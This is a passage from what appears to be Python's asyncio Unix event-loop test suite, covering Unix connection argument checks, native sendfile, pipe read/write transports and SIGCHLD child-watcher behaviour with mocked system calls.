with self.assertRaises(MemoryError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_unix_connection_path_sock(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, sock=object())
with self.assertRaisesRegex(ValueError, 'path and sock can not be'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nopath_nosock(self):
coro = self.loop.create_unix_connection(
lambda: None, None)
with self.assertRaisesRegex(ValueError,
'no path and sock were specified'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nossl_serverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, server_hostname='spam')
with self.assertRaisesRegex(ValueError,
'server_hostname is only meaningful'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_noserverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, ssl=True)
with self.assertRaisesRegex(
ValueError, 'you have to pass server_hostname when using ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_connection(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(os, 'sendfile'),
'sendfile is not supported')
class SelectorEventLoopUnixSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
self._ready = loop.create_future()
def connection_made(self, transport):
self.started = True
self.transport = transport
self._ready.set_result(None)
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, cleanup=True):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
if cleanup:
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
port = support.find_unused_port()
srv_sock = self.make_socket(cleanup=False)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: proto, sock=srv_sock))
self.run_loop(self.loop.sock_connect(sock, (support.HOST, port)))
self.run_loop(proto._ready)
def cleanup():
proto.transport.close()
self.run_loop(proto.wait_closed())
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test_sock_sendfile_not_available(self):
sock, proto = self.prepare()
with mock.patch('asyncio.unix_events.os', spec=[]):
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"os[.]sendfile[(][)] is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_a_file(self):
sock, proto = self.prepare()
f = object()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_iobuffer(self):
sock, proto = self.prepare()
f = io.BytesIO()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_regular_file(self):
sock, proto = self.prepare()
f = mock.Mock()
f.fileno.return_value = -1
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_cancel1(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
with contextlib.suppress(asyncio.CancelledError):
self.run_loop(fut)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_cancel2(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_blocking_error(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = mock.Mock()
fut.cancelled.return_value = False
with mock.patch('os.sendfile', side_effect=BlockingIOError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
key = self.loop._selector.get_key(sock)
self.assertIsNotNone(key)
fut.add_done_callback.assert_called_once_with(mock.ANY)
def test_sock_sendfile_os_error_first_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
with mock.patch('os.sendfile', side_effect=OSError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIsInstance(exc, asyncio.SendfileNotAvailableError)
self.assertEqual(0, self.file.tell())
def test_sock_sendfile_os_error_next_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = OSError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
def test_sock_sendfile_exception(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = asyncio.SendfileNotAvailableError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
class UnixReadPipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.Protocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFIFO
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def read_pipe_transport(self, waiter=None):
transport = unix_events._UnixReadPipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = asyncio.Future(loop=self.loop)
tr = self.read_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertIsNone(waiter.result())
@mock.patch('os.read')
def test__read_ready(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b'data'
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.protocol.data_received.assert_called_with(b'data')
@mock.patch('os.read')
def test__read_ready_eof(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b''
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.eof_received.assert_called_with()
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.read')
def test__read_ready_blocked(self, m_read):
tr = self.read_pipe_transport()
m_read.side_effect = BlockingIOError
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
test_utils.run_briefly(self.loop)
self.assertFalse(self.protocol.data_received.called)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.read')
def test__read_ready_error(self, m_read, m_logexc):
tr = self.read_pipe_transport()
err = OSError()
m_read.side_effect = err
tr._close = mock.Mock()
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
tr._close.assert_called_with(err)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal read error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
@mock.patch('os.read')
def test_pause_reading(self, m_read):
tr = self.read_pipe_transport()
m = mock.Mock()
self.loop.add_reader(5, m)
tr.pause_reading()
self.assertFalse(self.loop.readers)
@mock.patch('os.read')
def test_resume_reading(self, m_read):
tr = self.read_pipe_transport()
tr.resume_reading()
self.loop.assert_reader(5, tr._read_ready)
@mock.patch('os.read')
def test_close(self, m_read):
tr = self.read_pipe_transport()
tr._close = mock.Mock()
tr.close()
tr._close.assert_called_with(None)
@mock.patch('os.read')
def test_close_already_closing(self, m_read):
tr = self.read_pipe_transport()
tr._closing = True
tr._close = mock.Mock()
tr.close()
self.assertFalse(tr._close.called)
@mock.patch('os.read')
def test__close(self, m_read):
tr = self.read_pipe_transport()
err = object()
tr._close(err)
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
def test__call_connection_lost(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
class UnixWritePipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFSOCK
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def write_pipe_transport(self, waiter=None):
transport = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = asyncio.Future(loop=self.loop)
tr = self.write_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertEqual(None, waiter.result())
def test_can_write_eof(self):
tr = self.write_pipe_transport()
self.assertTrue(tr.can_write_eof())
@mock.patch('os.write')
def test_write(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 4
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test_write_no_data(self, m_write):
tr = self.write_pipe_transport()
tr.write(b'')
self.assertFalse(m_write.called)
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(b''), tr._buffer)
@mock.patch('os.write')
def test_write_partial(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 2
tr.write(b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'ta'), tr._buffer)
@mock.patch('os.write')
def test_write_buffer(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'previous')
tr.write(b'data')
self.assertFalse(m_write.called)
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'previousdata'), tr._buffer)
@mock.patch('os.write')
def test_write_again(self, m_write):
tr = self.write_pipe_transport()
m_write.side_effect = BlockingIOError()
tr.write(b'data')
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.unix_events.logger')
@mock.patch('os.write')
def test_write_err(self, m_write, m_log):
tr = self.write_pipe_transport()
err = OSError()
m_write.side_effect = err
tr._fatal_error = mock.Mock()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
tr._fatal_error.assert_called_with(
err,
'Fatal write error on pipe transport')
self.assertEqual(1, tr._conn_lost)
tr.write(b'data')
self.assertEqual(2, tr._conn_lost)
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
# This is a bit overspecified. :-(
m_log.warning.assert_called_with(
'pipe closed by peer or os.write(pipe, data) raised exception.')
tr.close()
@mock.patch('os.write')
def test_write_close(self, m_write):
tr = self.write_pipe_transport()
tr._read_ready() # pipe was closed by peer
tr.write(b'data')
self.assertEqual(tr._conn_lost, 1)
tr.write(b'data')
self.assertEqual(tr._conn_lost, 2)
def test__read_ready(self):
tr = self.write_pipe_transport()
tr._read_ready()
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.write')
def test__write_ready(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test__write_ready_partial(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 3
tr._write_ready()
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'a'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_again(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = BlockingIOError()
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_empty(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 0
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.write')
def test__write_ready_err(self, m_write, m_logexc):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = err = OSError()
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.assertTrue(tr.is_closing())
m_logexc.assert_not_called()
self.assertEqual(1, tr._conn_lost)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
@mock.patch('os.write')
def test__write_ready_closing(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._closing = True
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.protocol.connection_lost.assert_called_with(None)
self.pipe.close.assert_called_with()
@mock.patch('os.write')
def test_abort(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
self.loop.add_reader(5, tr._read_ready)
tr._buffer = [b'da', b'ta']
tr.abort()
self.assertFalse(m_write.called)
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test__call_connection_lost(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_close(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr.close()
tr.write_eof.assert_called_with()
# closing the transport twice must not fail
tr.close()
def test_close_closing(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr._closing = True
tr.close()
self.assertFalse(tr.write_eof.called)
def test_write_eof(self):
tr = self.write_pipe_transport()
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test_write_eof_pending(self):
tr = self.write_pipe_transport()
tr._buffer = [b'data']
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.protocol.connection_lost.called)
class AbstractChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = asyncio.AbstractChildWatcher()
self.assertRaises(
NotImplementedError, watcher.add_child_handler, f, f)
self.assertRaises(
NotImplementedError, watcher.remove_child_handler, f)
self.assertRaises(
NotImplementedError, watcher.attach_loop, f)
self.assertRaises(
NotImplementedError, watcher.close)
self.assertRaises(
NotImplementedError, watcher.is_active)
self.assertRaises(
NotImplementedError, watcher.__enter__)
self.assertRaises(
NotImplementedError, watcher.__exit__, f, f, f)
class BaseChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = unix_events.BaseChildWatcher()
self.assertRaises(
NotImplementedError, watcher._do_waitpid, f)
WaitPidMocks = collections.namedtuple("WaitPidMocks",
("waitpid",
"WIFEXITED",
"WIFSIGNALED",
"WEXITSTATUS",
"WTERMSIG",
))
class ChildWatcherTestsMixin:
ignore_warnings = mock.patch.object(log.logger, "warning")
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.running = False
self.zombies = {}
with mock.patch.object(
self.loop, "add_signal_handler") as self.m_add_signal_handler:
self.watcher = self.create_watcher()
self.watcher.attach_loop(self.loop)
def waitpid(self, pid, flags):
if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
self.assertGreater(pid, 0)
try:
if pid < 0:
return self.zombies.popitem()
else:
return pid, self.zombies.pop(pid)
except KeyError:
pass
if self.running:
return 0, 0
else:
raise ChildProcessError()
def add_zombie(self, pid, returncode):
self.zombies[pid] = returncode + 32768
def WIFEXITED(self, status):
return status >= 32768
def WIFSIGNALED(self, status):
return 32700 < status < 32768
def WEXITSTATUS(self, status):
self.assertTrue(self.WIFEXITED(status))
return status - 32768
def WTERMSIG(self, status):
self.assertTrue(self.WIFSIGNALED(status))
return 32768 - status
def test_create_watcher(self):
self.m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
def waitpid_mocks(func):
def wrapped_func(self):
def patch(target, wrapper):
return mock.patch(target, wraps=wrapper,
new_callable=mock.Mock)
with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
patch('os.waitpid', self.waitpid) as m_waitpid:
func(self, WaitPidMocks(m_waitpid,
m_WIFEXITED, m_WIFSIGNALED,
m_WEXITSTATUS, m_WTERMSIG,
))
return wrapped_func
@waitpid_mocks
def test_sigchld(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(42, callback, 9, 10, 14)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child is running
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (returncode 12)
self.running = False
self.add_zombie(42, 12)
self.watcher._sig_chld()
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.assert_called_once_with(42, 12, 9, 10, 14)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(42, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(43, callback1, 7, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(44, callback2, 147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (signal 3)
self.add_zombie(43, -3)
self.watcher._sig_chld()
callback1.assert_called_once_with(43, -3, 7, 8)
self.assertFalse(callback2.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback1.reset_mock()
# child 2 still running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 2 terminates (code 108)
self.add_zombie(44, 108)
self.running = False
self.watcher._sig_chld()
callback2.assert_called_once_with(44, 108, 147, 18)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(43, 14)
self.add_zombie(44, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children_terminating_together(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(45, callback1, 17, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(46, callback2, 1147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (code 78)
# child 2 terminates (signal 5)
self.add_zombie(45, 78)
self.add_zombie(46, -5)
self.running = False
self.watcher._sig_chld()
callback1.assert_called_once_with(45, 78, 17, 8)
callback2.assert_called_once_with(46, -5, 1147, 18)
self.assertTrue(m.WIFSIGNALED.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
m.WEXITSTATUS.reset_mock()
callback1.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(45, 14)
self.add_zombie(46, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_race_condition(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
# child terminates before being registered
self.add_zombie(50, 4)
self.watcher._sig_chld()
self.watcher.add_child_handler(50, callback, 1, 12)
callback.assert_called_once_with(50, 4, 1, 12)
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(50, -1)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_replace_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(51, callback1, 19)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register the same child again
with self.watcher:
self.watcher.add_child_handler(51, callback2, 21)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (signal 8)
self.running = False
self.add_zombie(51, -8)
self.watcher._sig_chld()
callback2.assert_called_once_with(51, -8, 21)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback2.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(51, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_remove_handler(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(52, callback, 1984)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# unregister the child
self.watcher.remove_child_handler(52)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (code 99)
self.running = False
self.add_zombie(52, 99)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_unknown_status(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(53, callback, -19)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
